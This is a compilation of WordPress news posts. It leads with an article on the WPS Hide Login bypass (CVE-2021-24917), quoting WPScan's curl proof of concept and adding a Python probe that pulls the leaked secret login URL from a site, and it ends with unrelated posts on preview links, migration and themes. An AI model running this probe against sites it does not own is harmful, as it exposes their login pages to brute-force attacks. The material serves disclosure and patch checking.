WORDPRESS

WordPress Security Plugin Exposes +1 Million Websites


The WPS Hide Login WordPress plugin recently patched a vulnerability that exposes a site's secret login page URL. The vulnerability lets an attacker defeat the purpose of the plugin (hiding the login page), which exposes the site to password-guessing and brute-force attacks against the login form.

Essentially, the vulnerability completely defeats the intended purpose of the plugin itself, which is to hide the WordPress login page.

WPS Hide Login

The WPS Hide Login security plugin blunts attempts to gain access to a WordPress site by moving the login page to a secret URL and making the default wp-login.php page and the wp-admin directory inaccessible to visitors who are not logged in.

WPS Hide Login is used by over one million websites to add a deeper layer of security.

Defeating hackers and bots that attack the default login page of a WordPress site doesn't actually require a plugin. An alternative that achieves the same effect is to install WordPress into a directory with a random name. Note that both approaches only hide the login form: they do not replace strong passwords, rate limiting, or two-factor authentication, and the hidden path stops being secret the moment it leaks, for example through a redirect, a log file, or a shared link.

Hacker bots look for the login page at its normal location, but it no longer exists at the URL they expect.

Instead of living at /wp-login.php, the login page is effectively hidden at /random-directory-name/wp-login.php.

Most login bots assume that the WordPress login page is at the default location, so they rarely go looking for it anywhere else.

The WPS Hide Login WordPress plugin is useful for sites that have already installed WordPress in the root, i.e. example.com/.

Report of Vulnerability

The vulnerability was publicly reported on the plugin’s support page.

A user of the plugin reported that if the site's main home page redirects elsewhere (for example from a bare domain to a subdomain), appending a specific file name to the redirecting URL exposes the URL of the hidden login page.

This is how they explained it:

“For example with the following domain: sub.domain.com if domain.com redirects to sub.domain.com there is the following bypass:

Enter the URL domain.com and add /wp-admin/options.php; it then redirects to sub.domain.com/changedloginurl and you see the login URL and can log in.”

Security Site Published a Proof of Concept

WPScan, a WordPress security organization, published a proof of concept. A proof of concept (PoC) is a minimal, reproducible demonstration that shows a vulnerability is real.

The security researchers published:

“The plugin has a bug which allows getting the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.

Proof of Concept

curl --referer "something" -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302”

The United States government's National Vulnerability Database rated the vulnerability (tracked as CVE-2021-24917) as High severity, giving it a CVSS base score of 7.5 on a scale of 0 to 10, where 10 represents the most severe rating.

WPS Hide Login Vulnerability Patched

The publishers of the WPS Hide Login plugin updated the plugin by patching the vulnerability.

The patch is contained in version 1.9.1.

According to the WPS Hide Login changelog:

“1.9.1
Fix : by-pass security issue allowing an unauthenticated user to get login page by setting a random referer string via curl request.”

Users of the affected plugin should update to version 1.9.1 or later so that the login page is actually hidden, and then re-run the WPScan request against their own site to confirm that the response is no longer a redirect to the secret login URL.
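The following script is an added example, not code from the article, WPScan, or the plugin. It reproduces the WPScan proof-of-concept request above (an unauthenticated GET to /wp-admin/options.php with an arbitrary Referer, redirects not followed) and reports what the Location header discloses, so it doubles as the post-update check recommended in the previous paragraph. The two in-memory "servers" are simplified models of the vulnerable and patched behaviour so the script runs offline; they are not the plugin's real logic, and the slug changedloginurl, the site URL, and the function names are assumptions.

```python
"""
Checker for the WPS Hide Login Referer bypass (CVE-2021-24917).

On an unpatched site, an unauthenticated GET /wp-admin/options.php that
carries any Referer header is answered with a 302 whose Location header
is the supposedly hidden login URL.  The checker sends the same request
the published curl one-liner does, refuses to follow redirects, and
reports what the Location header gives away.

The two in-memory "servers" are simplified models of the vulnerable and
patched behaviour so the script runs offline; they are not the plugin's
code.
"""
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

PROBE_PATH = "/wp-admin/options.php"
HIDDEN_SLUG = "changedloginurl"   # constructed: a site owner's secret login slug
REDIRECT_CODES = {301, 302, 303, 307, 308}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx responses: we want to read Location, not visit it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_transport(site_url, path, referer):
    """Live transport: GET site_url + path with a Referer set.
    Returns (status, headers) for the first response, redirect or not."""
    req = urllib.request.Request(urljoin(site_url, path), headers={"Referer": referer})
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, dict(resp.headers)
    except urllib.error.HTTPError as err:       # 3xx and 4xx responses end up here
        return err.code, dict(err.headers)


def vulnerable_server(path, headers):
    """Model of WPS Hide Login < 1.9.1: an anonymous request for the options
    page that carries a Referer is bounced to the hidden login page."""
    if path == PROBE_PATH and headers.get("Referer"):
        return 302, {"Location": "https://example.com/" + HIDDEN_SLUG}
    return 404, {}


def patched_server(path, headers):
    """Model of 1.9.1 and later: wp-admin stays a 404 for anonymous visitors."""
    return 404, {}


def simulated(server):
    """Wrap an in-memory server as a transport with the live transport's signature."""
    def transport(site_url, path, referer):
        return server(path, {"Referer": referer} if referer else {})
    return transport


def leaked_login_path(status, headers):
    """Return the login path disclosed by a redirect, or None if nothing leaks."""
    if status not in REDIRECT_CODES:
        return None
    location = next((v for k, v in headers.items() if k.lower() == "location"), "")
    path = urlparse(location).path.rstrip("/")
    # A bounce to the default login page, the admin area or the home page tells
    # the attacker nothing they did not already know.
    if not path or path.endswith("/wp-login.php") or path.endswith("/wp-admin"):
        return None
    return path


def probe(site_url, transport=http_transport, referer="something"):
    """Reproduce the PoC request and return the leaked login path, or None."""
    status, headers = transport(site_url, PROBE_PATH, referer)
    return leaked_login_path(status, headers)


if __name__ == "__main__":
    # Offline demonstration against the two models; call probe() with a real
    # site URL and the default transport to check a live install.
    for name, server in (("vulnerable", vulnerable_server), ("patched", patched_server)):
        print(name, "->", probe("https://example.com", simulated(server)))
```

Against the vulnerable model the probe returns /changedloginurl; against the patched model, or when no Referer is sent, it returns None. Only run the live transport against sites you are authorised to test.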

Citations

US Government National Vulnerability Database

CVE-2021-24917 Detail

WPScan Report of WPS Hide Login Vulnerability

WPS Hide Login < 1.9.1 – Protection Bypass with Referer-Header

Plugin Report of Vulnerability

Bypass-SECURITY ISSUE!!!

Official Plugin Changelog

WPS Hide Login Changelog

Searchenginejournal.com

An Easier Way to Share Progress on Your Website – WordPress.com News


We’re excited to announce Site Preview Links, a feature that will let you easily share a “Coming Soon” Business or eCommerce site.

Do you build sites for others? Have you ever struggled to coordinate and manage access to in-progress projects? How often do you have to help clients reset their passwords? We feel your pain, and we’re excited to announce Site Preview Links, a feature that will let you easily share a “Coming Soon” Business or eCommerce site.

Use Site Preview Links to Share Your Work

With Site Preview Links, you can generate a unique preview link for your in-progress Business or eCommerce site, allowing your team or clients to access the Coming Soon site without having to log in. This way, you can easily show off your work-in-progress and get feedback from your stakeholders without having to resend invites, update user roles, or reset passwords.

You can create and access the preview link directly from the Sites page.

You can then share the link with your team or client. When they access the preview link, they’ll bypass the Coming Soon screen and be able to view your site.

Site Preview Links is an easy-to-use feature that will save you time and hassle. It’s perfect for anyone who builds websites for others, whether you are an agency with a growing client roster, a contractor with just a handful of projects, or simply someone who knows a lot of people who need websites.

How Site Preview Links Work

WordPress.com uses an HMAC (a keyed hash) to generate a Preview Link token that is unique across all sites. With a 256-bit output there are 2^256 possible values, which heavily exceeds the number of grains of sand in the world!

Users who access your site using the shared preview link can continue navigating through the site, as WordPress.com uses a browser cookie to preserve the link value for the user’s session.

The link won’t expire, but you can disable it anytime. Users who already have access to your site using the preview link won’t be able to access the site anymore once you disable the link.

If you change your mind, you can always enable the link again, and we will generate a new, unique, ready-to-share URL.
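The model below is an added example of how a preview link with the properties described above can be built, not WordPress.com's implementation. It keeps a random per-link nonce server-side, derives the shareable token as HMAC-SHA256 over the site id and nonce, persists the token in a cookie after the first visit, and checks every request against the link's current state, which is what makes disabling the link cut off visitors who already hold the cookie and re-enabling it produce a fresh URL. The cookie name, the site ids, and the query parameter name are assumptions.

```python
"""
Model of a revocable, HMAC-based preview link for a Coming Soon site.

Illustrative design, not WordPress.com's code: each site gets a random
per-link nonce kept server-side; the shareable token is
HMAC-SHA256(server_key, site_id || nonce), so it is 256 bits long and
cannot be guessed or forged without the server key.  The first visit
with ?preview=<token> sets a cookie, later requests present the cookie,
and every request is checked against the link's current state.
"""
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # constructed: server-side secret, never sent out
COOKIE_NAME = "preview_link"           # assumed cookie name


class PreviewLinks:
    def __init__(self, key=SERVER_KEY):
        self._key = key
        self._nonces = {}                  # site_id -> nonce of the currently active link

    def _token(self, site_id, nonce):
        # NUL separator keeps "a" + "bc" and "ab" + "c" from colliding.
        msg = f"{site_id}\x00{nonce}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def enable(self, site_id):
        """Create (or rotate) the site's preview link and return its token."""
        nonce = secrets.token_hex(16)
        self._nonces[site_id] = nonce
        return self._token(site_id, nonce)

    def disable(self, site_id):
        """Revoke the link; every cookie issued from it stops working at once."""
        self._nonces.pop(site_id, None)

    def preview_url(self, site_url, site_id):
        """Shareable URL for the active link, or None when the link is disabled."""
        nonce = self._nonces.get(site_id)
        if nonce is None:
            return None
        return f"{site_url}/?preview={self._token(site_id, nonce)}"

    def is_valid(self, site_id, presented):
        """Constant-time check of a presented token against the active link."""
        nonce = self._nonces.get(site_id)
        if nonce is None or not isinstance(presented, str):
            return False
        expected = self._token(site_id, nonce).encode()
        return hmac.compare_digest(expected, presented.encode("utf-8", "replace"))


def visit(links, site_id, query_token=None, cookie_token=None):
    """Decide one request to a Coming Soon site.
    Returns (allowed, cookie_to_set): the token in the URL wins on the first
    visit and is persisted in the cookie; afterwards the cookie alone suffices.
    Validation is repeated on every request, so a disabled link locks out
    visitors who still carry the old cookie."""
    token = query_token or cookie_token
    if token and links.is_valid(site_id, token):
        return True, (query_token if query_token else None)
    return False, None


if __name__ == "__main__":
    links = PreviewLinks()
    token = links.enable("site-42")
    print(links.preview_url("https://sub.example.com", "site-42"))
    print(visit(links, "site-42", cookie_token=token))   # (True, None)
    links.disable("site-42")
    print(visit(links, "site-42", cookie_token=token))   # (False, None)
```

Storing the nonce rather than the token means a leaked database row is not enough to mint a working link without the server key; the same effect could be had by storing only a hash of a random token. Either way the cookie must be re-validated on every request, not trusted because it was once set, or disabling the link would not revoke existing sessions.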

If you need help with Preview Links, check out our more detailed guide.

Build Your Next Site on WordPress.com

Try Preview Links today and see how it can help you save time and make your life easier. Your clients will be impressed with the convenience, and you’ll be able to get their feedback faster.

Preview Links are just one of the reasons WordPress.com is the best managed WordPress hosting on the planet alongside other features we released this year: the Sites page, SSH access, SSH keys, and our data center picker. If you are interested in more details, you can follow our Developer Blog.

What other feature would you find valuable? How could we make WordPress.com an even more powerful place to build a website? Feel free to leave a comment or submit your ideas in our short feature request form.



An Easy Path Over to WordPress.com – WordPress.com News


If the recent Gumroad price change announcement has you considering a migration from Gumroad to WooCommerce, we’re here to welcome you with open arms. Changing eCommerce platforms may seem like a big hurdle to overcome, but we have an expert team in place to help you migrate your Gumroad store to the WordPress.com eCommerce Plan with WooCommerce.

With lower fees and transparent pricing, you’ll improve your margins and expand your earning potential. 

We’ve also created a tailored migration guide to walk merchants through importing from Gumroad to WooCommerce. This step-by-step process requires no technical expertise and will enable you to seamlessly transition your store.

When the import is complete, you’ll have a ready-to-go site with your content preloaded. Your customers will never know the difference. 

If you’re looking to get help moving from Gumroad, reach out now.



New WordPress.com Themes for January 2023 – WordPress.com News


Five beautiful new WordPress.com themes, including our new default theme, Twenty Twenty-Three.

The WordPress.com team is always working on new design ideas to bring your website to life. Below you’ll find the five newest themes that we’ve added to our library, with beautiful options for food-based businesses, podcasts, and bloggers.

To install any of the below themes, click the name of the theme you like, which brings you right to the installation page. Then simply click the “Activate this design” button. You can also click “Open live demo,” which brings up a clickable, scrollable version of the theme for you to preview.

Premium themes are free to use for any user on a Premium plan or above, or can be purchased individually by those with free sites or Personal plans.

You can explore all of our themes by navigating to the “Themes” page, which is found under “Appearance” in the left-side menu of your WordPress.com dashboard.


Twenty Twenty-Three is designed to take advantage of the new design tools introduced in WordPress 6.1.

With a clean, blank base as a starting point, this default theme includes ten diverse style variations created by members of the WordPress community.

Whether you want to build a complex or incredibly simple website, you can do it quickly and intuitively through the bundled styles or dive into creation and full customization yourself.

Click here to view a demo of this theme.


Tazza puts the spotlight on your products and your customers. This theme leverages WooCommerce to provide you with intuitive product navigation and the patterns you need to master digital merchandising.

Click here to view a demo of this theme.


Calyx is a minimalist theme designed for single-page websites. Featuring a coming-soon pattern on the homepage, Calyx is a perfect choice to spread the word about the upcoming opening of a cafe, restaurant, or bar.

Click here to view a demo of this theme.


Muscat is a simple blogging theme with grid post templates and a centered post layout. Its geometric sans-serif typography contributes to a delightful, comfortable, and modern reading experience.

Click here to view a demo of this theme.


Loudness is a bold opinionated theme created with music education in mind. Use Site Editor tooling and relevant patterns to create a unique experience.

Click here to view a demo of this theme.


Stay tuned for more updates about new themes, patterns, blocks, and other exciting product updates! And be sure to take a look at the entire showcase of themes we offer.

